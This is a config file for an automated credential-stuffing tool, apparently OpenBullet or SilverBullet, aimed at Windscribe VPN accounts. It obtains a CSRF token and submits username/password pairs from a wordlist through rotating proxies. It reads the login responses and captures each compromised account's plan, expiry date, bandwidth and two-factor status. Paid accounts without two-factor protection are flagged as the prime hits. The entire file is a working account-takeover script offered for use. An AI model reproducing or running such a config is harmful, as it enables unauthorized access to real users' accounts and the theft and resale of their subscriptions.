[SETTINGS]
{
  "Name": "WINDSCRIBE",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-03-16T21:48:29.1986769+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "WINDSCRIBE",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#GET_TM_TK REQUEST POST "https://res.windscribe.com/res/logintoken" 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER ": scheme: https" 
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "content-length: 0" 
  HEADER "origin: https://windscribe.com" 
  HEADER "referer: https://windscribe.com/" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Microsoft Edge\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-site" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Edg/99.0.1150.39" 

#TM PARSE "<SOURCE>" JSON "csrf_time" -> VAR "TM" 

#TK PARSE "<SOURCE>" JSON "csrf_token" -> VAR "TK" 

#US FUNCTION URLEncode "<USER>" -> VAR "US" 

#PS FUNCTION URLEncode "<PASS>" -> VAR "PS" 

#LOGIN REQUEST POST "https://windscribe.com/login" 
  CONTENT "login=1&upgrade=0&csrf_time=<TM>&csrf_token=<TK>&username=<US>&password=<PS>&code=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "cache-control: max-age=0" 
  HEADER "content-length: 136" 
  HEADER "content-type: application/x-www-form-urlencoded" 
  HEADER "origin: https://windscribe.com" 
  HEADER "referer: https://windscribe.com/login" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Microsoft Edge\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Edg/99.0.1150.39" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<COOKIES{*}>" Contains "ws_session_auth_hash" 
    KEY "My Account" 
  KEYCHAIN Failure OR 
    KEY "1 arguments had validation errors" 
    KEY "Login attempt limit reached. Try again in a few minutes." 
    KEY "Could not log in with provided credentials" 
    KEY "Please login with your username, not your email address." 

#USERNAE PARSE "<SOURCE>" LR "<h2>Username</h2>" "</span>" -> VAR "US" 

#USERNAME FUNCTION Replace "<span>" "" "<US>" -> CAP "USERNAME" 

#MEMBERSINCE PARSE "<SOURCE>" LR "id=\"delete_account_btn\">Delete Account</a></h2>" "</span>" -> VAR "MS" 

#MEMBERSINCE FUNCTION Replace "<span>" "" "<MS>" -> CAP "MEMBERSINCE" 

#PLAN PARSE "<SOURCE>" LR "<span id=\"ma_account_status\"><i class=\"ma_green_star\"></i> <strong>" "</strong>" -> VAR "PL" 

#PLAN FUNCTION Replace "<strong>" "" "<PL>" -> CAP "PLAN" 

#EXPIRE_IN PARSE "<SOURCE>" LR "<h2>Expiry Date</h2>" "</span>" -> VAR "EI" 

#EXPIRE_IN FUNCTION Replace "<span>" "" "<EI>" -> CAP "EXPIRE IN" 

#BANDWIDTH PARSE "<SOURCE>" LR "<h2>Bandwidth Usage</h2> <span>" "</span>" -> VAR "BW" 

#BANDWIDTH FUNCTION Replace "<span>" "" "<BW>" -> CAP "BANDWIDTH" 

#2FA PARSE "<SOURCE>" LR "<span id=\"ma_account_2fa_status\">" "</strong>" -> VAR "2F" 

#2FA FUNCTION Replace "<strong>" "" "<2F>" -> CAP "2FA" 

#FREE KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<PLAN>" Contains "Pro" 
    KEY "<2FA>" Contains "Disabled" 
  KEYCHAIN Custom "FREE" OR 
    KEY "<PLAN>" DoesNotContain "Pro" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "<2FA>" DoesNotContain "Disabled" 
    KEY "<2FA>" Contains "Enabeled" 

#AUTHOR FUNCTION Constant "@uzzzul" -> CAP "configby" 

